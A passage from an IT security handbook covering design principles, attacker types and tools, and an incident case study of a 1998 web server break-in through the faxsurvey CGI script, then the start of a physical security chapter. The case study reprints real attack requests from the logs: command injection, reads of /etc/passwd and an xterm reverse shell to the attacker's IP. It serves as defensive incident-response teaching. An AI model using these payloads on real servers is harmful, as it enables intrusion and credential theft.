should be small and simple so that it can be verified and correctly implemented. Complete mediation Every access should be checked for proper authorization. Open design Security should not depend upon the ignorance of the attacker. This criterion precludes back doors in the systems that give access to users who know about them. Separation of privilege Where possible, access to system resources should depend on more than one condition being satisfied. Least common mechanism Users should be isolated from one another by the system. This limits both covert monitoring and cooperative efforts to override system security mechanisms. Psychological acceptability The security controls must be easy to use so that they will be used and not bypassed. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 197 Unfortunately, designers often never learn these criteria, forget them, take shortcuts, or decide they're not important enough to bother with. As a result, there are many poorly-designed but widely-used operating systems, algorithms, and applications, including software that purports to be part of the security infrastructure of a system. Bad design leads to bugs and unforeseen side effects, which may cause accidental damage to your systems or information, or may be exploited intentionally by an attacker. Free vs. Proprietary Software One of the more controversial debates in software design is whether development processes that make source code freely available to users to inspect, modify, and redistribute ("free software" or "open source" software) should be preferred to proprietary ("closed source") development on the basis of security. On the one hand, freely available source code makes it easier for attackers to find exploitable bugs in a program by reading its source code. Because there are many common classes of program errors that lead to vulnerabilities, source code can sometimes even be submitted to automated analysis to turn up bugs. Bugs have certainly been found and exploited in open source software. On the other hand, closed source is not a panacea. In many cases, programs can be reverse-engineered, or vulnerabilities can be spotted through "black box" testing of a program without the source code. Clearly, lack of availability of the source code for Microsoft's Internet Information Server, for example, has not prevented attackers from exploiting several vulnerabilities, and this product seems to have a higher rate of exploits reported than, for example, the Apache web server. Open source development can makes it easier for program developers and users to spot and fix bugs before attackers find them. The OpenBSD operating system, which is free software, is widely acknowledged as one of the most secure operating systems currently available, in large part because it has had a security audit of every line of kernel source code by its developers. Other open source operating system kernels, including Linux, are not as heavily vetted and contain code from many developers. It is difficult to know the degree to which proprietary Unix operating systems such as Solaris have been audited for security. Understanding Your Adversaries Who is breaking into networked computers with the most sophisticated of attacks? It almost doesn't matter--no matter who the attackers may be, they all need to be guarded against. Script kiddies As clichéd as it may sound, in many cases the attackers are children and teenagers-- people who sadly have not (yet) developed the morals or sense of responsibility that is sufficient to keep their technical skills in check. It is common to refer to young people who use sophisticated attack tools as script kiddies. The term is derisive. The word "script" implies that the attackers use readily available attack scripts that can be downloaded from the PART Internet to do their bidding, rather than creating their own attacks. And, of course, the attackers are called "kiddies" because so many of them turn out to be underage when they are apprehended. FIVE Script kiddies should be considered a serious threat and feared for the same reason that teenagers with guns should be feared. In many cases, teenagers with handguns should be feared even more than adults, because a teenager is less likely to understand the consequences of his actions should he pull the trigger and thus more likely to pull it. 198 IT SECURITY FOR TECHNICAL ADMINISTRATORS The same is true of script kiddies. In May 2001, for instance, the web site of Gibson Research Corporation was the subject of a devastating distributed denial-of-service attack that shut down its web site for more than 17 hours. The attack was orchestrated by more than 400 Windows computers around the Internet that had been compromised by an automated attack. As it turns out, Steve Gibson was able to get a copy of the attack program, reverse- engineer it, and trace it back. It turned out that his attacker was a 13-year-old girl. Likewise, when authorities in Canada arrested "Mafiaboy" on April 19, 2000, for the February 2000 attacks on Yahoo, E*TRADE, CNN, and many other high-profile sites--attacks that caused more than $1.7 billion in damages-- they couldn't release the suspect's name to the public because the 16-year-old was shielded by Canada's laws protecting the privacy of minors.208 Script kiddies may not have the technical skills necessary to write their own attack scripts and Trojan horses, but it hardly matters. They have the tools and increasingly they show few reservations about using them. Either they do not understand the grave damage they cause, or they do not care. What does a script kiddie do when he grows up? Nobody is really sure--to date, there are no reliable studies. Anecdotal reports suggest that many script kiddies go straight. Some lose interest in computers; some become system operators and network administrators; and some even go into the field of computer security. (The wisdom of hiring one of these individuals to watch over your network is a matter of debate within the computer security community.) But it is unquestionably clear that some individuals continue their lives of crime. Industrial spies There appears to be a growing black market for information stolen from computer systems. Some individuals have tried to ransom or extort the information from its rightful owners--for example, by offering to help a company close its vulnerabilities in exchange for a large cash payment. There have been several documented cases (and perhaps many more unreported) in which criminals have stolen credit card numbers of clients from a company's server and threatened to post the information unless the company paid them. There have also been reports of attackers who have tried to sell industrial secrets to competitors of the companies that they have penetrated. Such transactions are illegal in the United States and in many other countries, but not in all. Ideologues and national agents There is a small but growing population of "hacktivists" who break into sites for ideological or political reasons. Often, the intent of these people is to deface web pages to make a statement of some kind, by defacement of law enforcement agencies, destruction of web sites by environmental groups, or destruction of research computing sites involving animal studies, to give some examples. Sometimes, the protesters are making a political statement; they may be advancing an ideological cause, or they may merely be anarchists striking a blow against technology or business. Sometimes, these incidents may be carried out against national interests. For instance, a guerilla movement may deface sites belonging to a government opponent. In other cases, you see individuals in one jurisdiction attempting to make some point by attacking sites in another, such as in the Israeli-Palestinian conflict, the ongoing tension between Pakistan and India, and the aftermath of the accidental bombing of the Chinese embassy by U.S. forces. Many of these attacks may be spontaneous, but some may be coordinated or financed by the governments themselves. 208http://news.cnet.com/news/0-1005-200-4523277.html Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 199 These incidents can also affect third parties. For instance, during a Chinese crackdown, many ISPs around the world hosting web pages of adherents of Falun Gong found their servers under attack from sites inside China. Because of the coordination and replication of the attacks, authorities believed they were actually state-sponsored. ISPs have been attacked by vigilantes because they sell service to spammers, provide web service for hate groups, or seem to be associated with child pornographers--even if the ISP owners and operators were unaware of these activities! Organized crime Vast amounts of valuable information and financial data flow through the Internet. It would be naive to believe that the criminal element is unaware of this, or is uninterested in expanding into the networked world. There have been incidents of fraud, information piracy, and money laundering conducted online that officials believe are all related to organized crime. Communications on the Net have been used to advance and coordinate prostitution and pornography, gambling, trafficking in illegal substances, gun running, and other activities commonly involving organized crime. Furthermore, law enforcement sites may be targeted by criminals to discover what is known about them, or to discover identities of informants and witnesses. With network globalization, the threats have a longer reach. The Russian mob, Sicilian Mafia, Japanese Yakuza, South American drug families, and Los Angeles gangs (to name a few) are all a few mouse clicks away on the network. Many law enforcement officials worry as a result that the Internet is a "growth" area for crime in the coming decade. Rogue employees and insurance fraud Finally, there are many cases of tactically skilled employees who have turned against their employers out of revenge, malice, or boredom. In some cases, terminated employees have planted Trojan horses or logic bombs in their employer's computers. In other cases, computer systems have been destroyed by employees as part of insurance scams. What the Attacker Wants Compromising a computer system is usually not an end in itself. Instead, most attackers seek to use compromised systems as a stepping-stone for further attacks and vandalism. After an attacker compromises a system, the system can be used for many nefarious purposes, including: · Launching probes or exploits against other systems · Participating in distributed denial-of-service (DDOS) attacks · Running covert servers (e.g., the attacker might set up an Internet Relay Chat server that will act as a rendezvous point for Trojan horses and viruses that are sending back captured data) · Covertly monitoring the network of the organization that owns the compromised system, with the goal of compromising more systems · Becoming a repository for attack tools, pirated software, pornography, or other kinds of contraband information There are many reasons that compromised systems make excellent platforms for these kinds of illegal activities. If a PART compromised system is connected to a high-speed Internet connection, the system may be able to do much more damage and mayhem than other systems that the attacker controls. Compromised systems can also be used to make FIVE it more difficult for authorities to trace an attacker's actions back to the person behind the keyboard. If an attacker hops through many computers in different jurisdictions--for example, from a compromised Unix account in France to a Windows proxy server in South Korea to an academic computer center in Mexico to a backbone router in New York--it may be effectively impossible to trace the attacker backward to the source. 200 IT SECURITY FOR TECHNICAL ADMINISTRATORS Tools of the Attacker's Trade A smattering of tools that have been commonly used by attackers would include: nc (a.k.a. netcat) Originally written by "Hobbit," netcat is the Swiss Army knife for IP-based networks. As such, it is a valuable diagnostic and administrative tool as well as useful to attackers. You can use netcat to send arbitrary data to arbitrary TCP/IP ports on remote computers, to set up local TCP/IP servers, and to perform rudimentary port scans. trinoo (a.k.a. trin00) trinoo is the attack server. trinoo waits for a message from a remote system and, upon receiving the message, launches a denial-of-service attack against a third party. Versions of trinoo are available for most Unix operating systems, including Solaris and Red Hat Linux. The presence of trinoo is usually hidden. A detailed analysis of trinoo can be found at http://staff.washington.edu/dittrich/misc/trinoo.analysis. Back Orifice and Netbus These Windows-based programs are Trojan horses that allow an attacker to remotely monitor keystrokes, access files, upload and download programs, and run programs on compromised systems. bots Short for robots, bots are small programs that are typically planted by an attacker on a collection of computers scattered around the Internet. Bots are one of the primary tools for conducting distributed denial-of-service attacks and for maintaining control on Internet Relay Chat channels. Bots can be distributed by viruses or Trojan horses. They can remain dormant for days, weeks, or years until they are activated. Bots can even engage in autonomous actions. root kits A root kit is a program or collection of programs that simultaneously gives the attacker superuser privileges on a computer, plants back doors on the computer, and erases any trace that the attacker has been present. Originally, root kits were designed for Unix systems (hence the name "root"), but root kits have been developed for Windows systems as well. A typical root kit might attempt a dozen or so different exploits to obtain superuser privileges. Once superuser privileges are achieved, the root kit might patch the login program to add a back door, then modify the computer's kernel so that any attempt to read the login program returns the original, unmodified program, rather than the modified one. Commands might be modified so that network connections from the attacker's machine are not displayed. Finally, the root kit might then erase the last five minutes of the computer's log files. Worms Worms exploiting vulnerabilities in network servers or networking components of operating systems have become a common way to compromise large numbers of computers at once. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 201 Case Study: Faxsurvey On October 7, 1998, an employee at Vineyard.NET noticed that the user http was logged in to the company's primary web server: Script started on Wed Oct 7 20:54:21 1998 bash-2.02# W 8:57PM up 27 days, 14:19, 5 users, load averages: 0.28, 0.33, 0.35 USER TTY FROM LOGIN@ IDLE WHAT http p0 KRLDB110-06.spli Tue02AM 1days /bin/sh simsong p1 asy12.vineyard.n 8:42PM 15 -tcsh (tcsh) ericx p2 mac-ewb.vineyard 8:46PM 0 script ericx p3 mac-ewb.vineyard 8:46PM 11 top ericx p4 mac-ewb.vineyard 8:53PM 1 sleep 5 bash-2.02# This computer was running the BSDI v3.1 operating system with all patches as released by the vendor. The web server was a version of the Apache web server named Strong-hold. The computer was used to initiate Automated Clearing House electronic funds transfers from customer accounts. To assist in these funds transfers, the computer held credit card and bank account information. (Fortunately, that information on the computer was stored in an encrypted format.) In all likelihood, a user logged in as http could be the result of two things. First, it could be a member of the ISP's staff who was using the http account for debugging. Alternatively, it could be an attacker who had found some way to break into the http account, but had been unable to gain additional access. Because the user http was logged in from a computer whose name began KRLDB110-06.spli, it appeared to the staff that this was a case of unauthorized access. When the intrusion was discovered, one of the staff members immediately started the Unix program script to record his actions. The intruder appeared to be idle for more than a day. The original intrusion had taken place on Tuesday at 2:00 a.m. The next step was to list all of the processes currently running on the computer. Two processes were out of place -- they were two copies of the /bin/sh shell that were being run by http. Both of those shells had been started on the previous day, one at 2:00 a.m., the other at 4:00 a.m: bash-2.02# ps auxww USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND root 11766 3.0 0.0 0 0 ?? Z 23Sep98 0:00.00 (admin_server) root 3763 1.0 0.0 0 0 ?? Z 2:03PM 0:00.00 (junkbuster) mail 18120 1.3 0.3 816 724 ?? S 8:56PM 0:00.64 smap root 17573 1.0 0.0 0 0 ?? Z 11:03AM 0:00.00 (admin_server) PART root 16 0.0 0.0 68 64 ?? Is 10Sep98 0:00.00 asyncd 2 root 18 0.0 0.0 68 64 ?? Is 10Sep98 0:00.02 asyncd 2 root 28 0.0 8.0 748 20680 ?? Ss 10Sep98 0:16.32 mfs -o rw -s 40960 /dev/ sd0b /tmp (mount_mfs) FIVE root 53 0.0 0.1 268 296 ?? Ss 10Sep98 0:38.23 gettyd -s ... 202 IT SECURITY FOR TECHNICAL ADMINISTRATORS root 18670 0.0 0.5 560 1276 ?? S Tue02AM 0:04.77 (xterm) http 18671 0.0 0.1 244 276 p0 Is Tue02AM 0:02.23 /bin/sh http 26225 0.0 0.1 236 276 p0 I+ Tue04AM 0:00.07 /bin/sh Apparently, the intruder had broken in and then, for some reason, had given up. As there appeared to be no immediate urgency, the ISP carefully formulated a plan of action: 1. Do not alert the intruder about what is happening. 2. Determine the intruder's source IP address. 3. Use the Unix kill command to STOP the intruder's processes. This signal would prevent the processes from running while leaving a copy in memory. 4. Make a copy of the intruder's processes using the Unix gcore command. 5. Place a rule on the ISP router to block packets from the intruder's ISP. 6. Kill the intruder's processes unequivocally with kill -9 7. Determine how the intruder had broken in and fix the hole. 8. Alert law enforcement. To trace the intruder, the ISP tried using the netstat command. This turned up a new piece of information. The intruder had not broken in with Telnet or SSH; instead, there was an X11 connection from the web server (Apache.Vineyard.NET) to an X server running on the intruder's computer: bash-2.02# netstat -a Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp 0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1137 SYN_RCVD tcp 0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1136 SYN_RCVD tcp 0 0 VINEYARD.NET.http nhv-ct4-09.ix.ne.1135 SYN_RCVD tcp 0 0 VINEYARD.NET.http DSY27.VINEYARD.N.1079 SYN_RCVD tcp 0 2456 VINEYARD.NET.http nhv-ct4-09.ix.ne.1134 ESTABLISHED tcp 0 2268 VINEYARD.NET.http DSY27.VINEYARD.N.1078 ESTABLISHED tcp 0 2522 VINEYARD.NET.http 209.174.140.26.1205 ESTABLISHED tcp 0 8192 VINEYARD.NET.http host-209-214-118.1785 ESTABLISHED tcp 0 4916 VINEYARD.NET.http host-209-214-118.1784 ESTABLISHED tcp 0 0 VINEYARD.NET.http host-209-214-118.1783 ESTABLISHED tcp 0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1163 FIN_WAIT_2 tcp 0 0 LOCALHOST.VINEYA.sendm LOCALHOST.VINEYA.1135 ESTABLISHED tcp 0 0 LOCALHOST.VINEYA.1135 LOCALHOST.VINEYA.sendm ESTABLISHED tcp 0 0 VINEYARD.NET.smtp 208.135.218.34.1479 ESTABLISHED tcp 0 3157 VINEYARD.NET.pop ASY5.VINEYARD.NE.1027 ESTABLISHED tcp 0 0 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.2050 ESTABLISHED tcp 0 0 VINEYARD.NET.http host-209-214-118.1782 FIN_WAIT_2 tcp 0 0 VINEYARD.NET.http host-209-214-118.1781 FIN_WAIT_2 tcp 0 0 VINEYARD.NET.http host-209-214-118.1775 FIN_WAIT_2 tcp 0 0 VINEYARD.NET.http 56k-2234.hey.net.1099 FIN_WAIT_2 tcp 0 0 VINEYARD.NET.https ESY8.VINEYARD.NE.1557 FIN_WAIT_2 tcp 0 0 LOCALHOST.VINEYA.sendm LOCALHOST.VINEYA.1058 ESTABLISHED tcp 0 0 LOCALHOST.VINEYA.1058 LOCALHOST.VINEYA.sendm ESTABLISHED Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 203 tcp 0 0 APACHE.VINEYARD..smtp m28.boston.juno..54519 ESTABLISHED tcp 0 0 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.nfs ESTABLISHED tcp 0 328 APACHE.VINEYARD..ssh MAC-EWB.VINEYARD.2048 ESTABLISHED tcp 0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1162 FIN_WAIT_2 tcp 0 0 VINEYARD.NET.http ASY14.VINEYARD.N.1160 FIN_WAIT_2 tcp 0 0 NEXT.VINEYARD.NE.ssh ASY12.VINEYARD.N.1047 ESTABLISHED tcp 0 7300 VINEYARD.NET.pop DSY27.VINEYARD.N.1061 ESTABLISHED tcp 0 0 NEXT.VINEYARD.NE.imap2 ASY12.VINEYARD.N.1041 ESTABLISHED tcp 0 0 VINEYARD.NET.3290 VINEYARD.NET.imap2 CLOSE_WAIT tcp 0 0 VINEYARD.NET.ssh simsong.ne.media.1017 ESTABLISHED tcp 0 0 APACHE.VINEYARD..3098 KRLDB110-06.spli.X11 ESTABLISHED tcp 8760 0 VINEYARD.NET.1022 BACKUP.VINEYARD..ssh ESTABLISHED tcp 0 0 LOCALHOST.VINEYA.4778 *.* LISTEN tcp 0 0 LOCALHOST.VINEYA.domai *.* LISTEN tcp 0 0 NET10.VINEYARD.N.domai *.* LISTEN tcp 0 0 SMTP4.VINEYARD.N.domai *.* LISTEN The ISP concluded that the attacker had used a vulnerability in a CGI script to spawn an xterm back to his remote machine. To test this hypothesis, the ISP did a quick search through its web server logs: % grep -I krldb110-06 /vni/apache/log/access_log 1. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] "GET /cgi-bin/ phf?Qname=me%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva" 2. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/ faxsurvey?ls%20-lFa HTTP/1.0" 200 5469 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva" 3. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/ view- source?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva" 4. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:53 -0400] "GET /cgi-bin/ htmlscript?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/ 4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva" 5. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:54 -0400] "GET /cgi-bin/ campas?%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4. 01; Windows 98)" "/htdocs/biz/captiva" 6. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:55 -0400] "GET /cgi-bin/ handler/useless_shit;ls%20- lFa|?data=Download HTTP/1.0" 404 - "-" "Mozilla/ 4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva" 7. krldb110-06.splitrock.net - - [06/Oct/1998:02:53:56 -0400] "GET /cgi-bin/ php.cgi?/etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4. 01; Windows 98)" "/htdocs/biz/captiva" 8. krldb110-06.splitrock.net - - [06/Oct/1998:02:54:30 -0400] "GET /cgi-bin/ faxsurvey?ls%20-lFa HTTP/1.1" 200 5516 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva" 9. krldb110-06.splitrock.net - - [06/Oct/1998:02:54:44 -0400] "GET /cgi-bin/ faxsurvey?uname%20-a HTTP/1.1" 200 461 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva" PART 10. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:03 -0400] "GET /cgi-bin/ faxsurvey?id HTTP/1.1" 200 381 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva" FIVE 11. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:39 -0400] "GET /cgi-bin/ faxsurvey?cat%20/etc/passwd HTTP/1.1" 200 79467 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva" 12. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:44 -0400] "GET /cgi-bin/ faxsurvey?ls%20-lFa%20/usr/ HTTP/1.1" 200 1701 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva" 204 IT SECURITY FOR TECHNICAL ADMINISTRATORS 13. krldb110-06.splitrock.net - - [06/Oct/1998:04:31:55 -0400] "GET /cgi-bin/ faxsurvey?id HTTP/1.1" 200 381 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net" 14. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:01 -0400] "GET /cgi-bin/ faxsurvey?pwd HTTP/1.1" 200 305 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net" 15. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:08 -0400] "GET /cgi-bin/ faxsurvey?/bin/pwd HTTP/1.1" 200 305 "-" "Mozilla/4.0 (compatible; MSIE 4. 01; Windows 98)" "/htdocs/web.vineyard.net" 16. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:33 -0400] "GET /cgi-bin/ faxsurvey?ls%20-lFa HTTP/1.1" 200 5516 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net" 17. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:55 -0400] "GET /cgi-bin/ faxsurvey?ls%20- lFa%20../conf/ HTTP/1.1" 200 305 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net" Notice that lines 1­7 each occur within a few seconds of each other. It appears that the attacker is using an automated tool that checks for CGI vulnerabilities. In 8­17 the attacker exploits a vulnerability in the faxsurvey script. This was almost certainly done with a different tool; one indication is that the version of the HTTP protocol that the client supports changes from "HTTP/1.0" to "HTTP/1.1". The web server log file revealed that the full hostname of the attacker was krldb110-06. splitrock.net. Using the host command, this address could be translated into an actual IP address: apache: {43} % host krldb110-06.splitrock.net krldb110-06.splitrock.net has address 209.156.113.121 apache: {44} % By inspecting the log file, it appears that the script /cgi-bin/faxsurvey has a bug that allows the attacker to execute arbitrary commands. (Otherwise, why else would the attacker keep sending URLs calling the same script with different arguments?) If this is true, then the following commands must have been executed by the attacker: ls -lFa ls -lFa uname -a id cat /etc/passwd ls -lFa /usr/ id pwd /bin/pwd ls -lFa ls -lFa ../conf/ It is not clear from the log files how the attacker was able to go from executing these commands to executing the xterm command. But is very clear that the xterm command was executed, as evidenced by the http entry in the output of the w command, the running (xterm) process, and the X11 entry in the netstat command. At this point, the ISP searched for the attacker's hostname in other log files. A suspicious result was found in the messages log file -- apparently the attacker had attempted to exploit a POP or qpopper bug: Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 205 apache: {15} % grep -i krldb110-06 * messages:Oct 6 03:38:29 apache popper.bsdos[22312]: @KRLDB110-06. splitrock.net: -ERR POP timeout To preserve the record of the attacker's processes, they were stopped, an image of the process memory was saved, and then the processes were killed. Following this, a rule was added to the ISP's routers to block access from the attacker's IP addresses. Permissions on the faxsurvey script were changed to prevent any access, pending an investigation. A few days later, the script was removed from the web server. The attacked ISP contacted SplitRock Services, Inc., the ISP that was responsible for the IP address. It was determined that SplitRock operated several modem pools that were provided to another ISP (Prodigy) on a leasing arrangement. SplitRock was asked to preserve its logfiles so that they could be used in a future legal investigation. By using the Unix strings command over the process memory image files, it was possible to extract significantly more information about the attacker. One group of strings was from the shell history that was, effectively, a list of the commands that the attacker had typed. The attacker appeared to have downloaded a rootkit, and also to have attempted to get a buffer overflow attack to work properly against the system's IMAP server: -lFa gcc -o s s.c st2.c ftp 209.156.113.121 cron.c gcc -o s st2.c cxterm.c ./s console x2.c t .s qpush.c .121 cat t.c qpush.c cat .c ppp.c cat s.c t2.c gc c cron.c ls -lFa cxterm.c ./s -v c2 tcsh ./s p0 x2.c ls -lFa / README cat .s README.debian ls -lFa qpush cat /w qpush.c ls -lFa / qpush.c.old cat .s Gf: not found _=.s /tmp $ : not found mfs:28 gcc -o s steal.c /bin/sh PART ls -lFa *.c /bin/sh FIVE /bin/sh /etc/inetd.conf qpush.c 206 IT SECURITY FOR TECHNICAL ADMINISTRATORS /usr/bin/gcc n/gcc ./cc Expr Done /bin/sh inetd.conf t) | telnet 127.1 143 cd /etc cat .s which pwd ls ­lFa expr $L + 1 ls ­lFa ./cc ­10 ./cc The second kind of strings found in the memory images corresponded to shell environment variables. Many of these were variables that would be set for a process spawned from a CGI script -- confirming that the shell was, in fact, the result of a CGI attack. This block confirmed that the CGI script responsible for the intrusion was the faxsurvey script. GATEWAY_INTERFACE=CGI/1.1 REMOTE_HOST=krldb110-06.splitrock.net MACHTYPE=i386-pc-bsdi3.1 HOSTNAME=apache.vineyard.net L=100 SHLVL=1 REMOTE_ADDR=209.156.113.121 QUERY_STRING=/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20- rv%20-e%20/bin/sh DOCUMENT_ROOT=/htdocs/biz/captiva REMOTE_PORT=4801 HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 4.01; Windows 98) HTTP_ACCEPT=application/vnd.ms-excel, application/msword, application/vnd. ms-powerpoint, */* SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey HTTP_HOST=www.captivacruises.com LOGNAME=http WINDOWID=8388621 _=/bins REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156. 113.121:0.0%20-rv%20- e%20/bin/sh SERVER_SOFTWARE=Stronghold/2.2 Apache/1.2.5 C2NetUS/2002 TERM=xterm HTTP_CONNECTION=Keep-Alive PATH=/usr/local/bin:/bin:/usr/bin:/usr/sbin HTTP_ACCEPT_LANGUAGE=en-us DISPLAY=209.156.113.121:0.0 SERVER_PROTOCOL=HTTP/1.1 HTTP_ACCEPT_ENCODING=gzip, deflate Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 207 SHELL=/bin/tcsh REQUEST_METHOD=GET OSTYPE=bsdi3.1 SERVER_ADMIN=mvol@vineyard.net SERVER_ROOT=/usr/local/apache TERMCAP=xterm|vi|xterm-ic|xterm-vi|xterm with insert character instead of insert mode: :al@:dl@:im=:ei=:mi@:ic=\E[@: :AL=\E[%dL:DC=\E[%dP:DL=\E[ %dM:DO=\E[%dB:IC=\E[%d@:UP=\E[%dA: :al=\E[L:am: :bs:cd=\E[J:ce=\ E[K:cl=\E[H\E[2J:cm=\E[%i%d;%dH:co#80: :cs=\E[%i%d;%dr:ct=\E[3k: :dc SERVER_PORT=80 SCRIPT_NAME=/cgi-bin/faxsurvey HOSTTYPE=i386 After the intrusion, the victim ISP contacted the Boston office of the Federal Bureau of Investigation. The ISP was informed that the Boston office had a damage threshold of $8,000 that needed to be exceeded before an investigation could be opened. As this threshold had not been met, no investigation would take place. While such minimums are understandable, they are unfortunate for two reasons: · Many attacks are conducted by relatively young offenders, who might cease such activity if they received a warning or, at most, a suspended sentence. The lack of any official investigation and follow-up only encourages these attackers to engage in larger and larger crimes until they are responsible for serious damage. · In this case, the attacker appeared to be quite sophisticated. It's quite possible that the attacker was engaged in other illegal activities that usually go by without anyone noticing. There are many cases in which the investigation of relatively small crimes have led law enforcement agencies to significant criminal enterprises. For example, it was a 75-cent accounting discrepancy that caused Cliff Stoll to track down a computer hacker who was ultimately found to be breaking into US commercial and military computers at the behest of the Soviet Union (a story detailed in Stoll's classic hacker thriller, The Cuckoo's Egg). As it turns out, the vulnerability in the faxsurvey script had been reported over the BugTraq mailing list nearly three months prior to the attack. Either nobody from the ISP had been reading the BugTraq mailing list, or else no one was aware that the faxsurvey script had been installed: Date: Tue, 4 Aug 1998 07:41:24 -0700 Reply-To: dod@muenster.net From: Tom Subject: remote exploit in faxsurvey cgi-script Hi! There exist a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any command s/he wants with the permissions of the HTTP-Server. All the attacker has to do is type http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd in his PART favorite Web-Browser to get a copy of your Password-File. FIVE All S.u.S.E. 5.1 and 5.2 Linux Dist. (and I think also older ones) with the HylaFAX package installed are vulnerable to this attack. 208 IT SECURITY FOR TECHNICAL ADMINISTRATORS AFAIK the problem exists in the call of 'eval'. I notified the S.u.S.E. team (suse.de) about that problem. Burchard Steinbild told me, that they have not enough time to fix that bug for their 5.3 Dist., so they decided to just remove the script from the file list. After the break-in, the ISP performed the following cleanup: · An immediate backup of all disks was done. This backup was preserved as evidence in the event that damage was discovered that needed to be addressed. · The system was scanned for new privileged files. None were found. · Permissions on the /usr/include directory and the C compiler were changed so that only staff members could access these files and compile new programs. · Key programs were compared with the distribution CD-ROM to determine if any had been modified. They had not been. · All log files were manually examined for additional suspicious activity. None was found. · After a week, the router rule blocking access to SplitRock was removed. Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 209 CHAPTER 3. PHYSICAL SECURITY At a Glance "Physical security" is almost everything that happens before you start typing commands on the keyboard. It's the building alarm system. It's the key lock on your computer's power supply, the locked computer room with the closed-circuit camera, and the uninterruptible power supply and power conditioners. Despite the fact that physical security is often overlooked, it is extraordinarily important. This chapter discusses many physical security threats, including environmental dangers, vandalism and sabotage, and theft. It offers suggestions for how to address them. Elements of Physical Security People First It should go without saying that in an emergency or disaster situation, the lives and safety of personnel should always come before data or equipment. Although there may be very limited exceptions to this rule (in certain military situations), you should never lose sight of what is truly irreplaceable. Planning for the Forgotten Threats Surprisingly, many organizations do not consider physical security. One New York investment house was spending tens of thousands of dollars on computer security measures to prevent break-ins during the day, only to discover that its cleaning staff was propping open the doors to the computer room at night while the floor was being mopped. A magazine in San Francisco had more than $100,000 worth of computers stolen over a holiday: an employee had used his electronic key card to unlock the building and disarm the alarm system; after getting inside, the person went to the supply closet where the alarm system was located and removed the paper log from the alarm system's printer. Other organizations feel that physical security is simply too complicated or too difficult to handle properly. Few organizations have the ability to protect their servers from a nuclear attack, a major earthquake, or a terrorist bombing. But it is important not to let these catastrophic possibilities paralyze and prevent an organization from doing careful disaster planning. The issues that physical security encompasses--the threats, practices, and protections--are different for practically every different site and organization. Because every site is different, this chapter can't give you a set of specific recommendations. It can only give you a starting point, a list of issues to consider, and a suggested procedure for formulating your actual plan. The Physical Security Plan PART The first step to physically securing your installation is to formulate a written plan addressing your current physical security needs and your intended future direction. Ideally, your physical plan should be part of your site's written security policy. This plan should be reviewed by others for completeness, and it should be approved by your FIVE organization's senior management. Thus, the purpose of the plan is both planning and political buy-in. Your security plan should describe the assets you're protecting, their value, the areas where they're located, and the likely threats and their associated probabilities. Don't forget to include information as an asset. You'll also want to 210 IT SECURITY FOR TECHNICAL ADMINISTRATORS outline your security perimeter ­ the boundary between the rest of the world and your secure area ­ and any holes in the perimeter, along with your defense, plans for strengthening them, and the cost of implementing those plans. If you are managing a particularly critical installation, take great care in formulating this plan. Have it reviewed by an outside firm that specializes in disaster recovery planning and risk assessment. Consider your security 